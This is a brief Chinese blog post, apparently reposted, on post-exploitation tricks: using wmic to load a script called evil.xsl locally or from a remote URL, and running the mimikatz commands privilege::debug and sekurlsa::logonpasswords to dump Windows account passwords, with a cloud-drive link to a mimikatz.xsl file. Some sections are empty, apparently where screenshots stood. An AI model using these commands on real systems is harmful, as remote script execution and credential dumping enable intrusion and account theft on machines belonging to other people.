wmic与mimikatz技巧

前言

wmic是比cmd强大的命令行。轻量级调试器神器mimikatz,后渗透常用。

测试wmic

使用wmic能够从本地或从URL调用XSL(可扩展样式表语言)脚本。

本地:
wmic process list /FORMAT:evil.xsl
远程:
wmic os get /FORMAT:"https://example.com/evil.xsl"

本地:

命令:

privilege::debug
sekurlsa::logonpasswords

密码账号:

扫描二维码关注公众号,回复: 1645323 查看本文章

远程:

OK

PowerShell

项目: https://github.com/caseysmithrc/XSLIdeas

总结:

emmmm,多关注墙外的知识。

mimikatz.xsl :

链接:https://pan.baidu.com/s/1rA5X4yQXprOME4cV-0TCaA 密码:4vcb

参考:

https://www.secpulse.com/archives/71380.html
https://www.t00ls.net/viewthread.php?tid=45774&extra=&page=1

猜你喜欢

转载自www.cnblogs.com/s0mf/p/9200974.html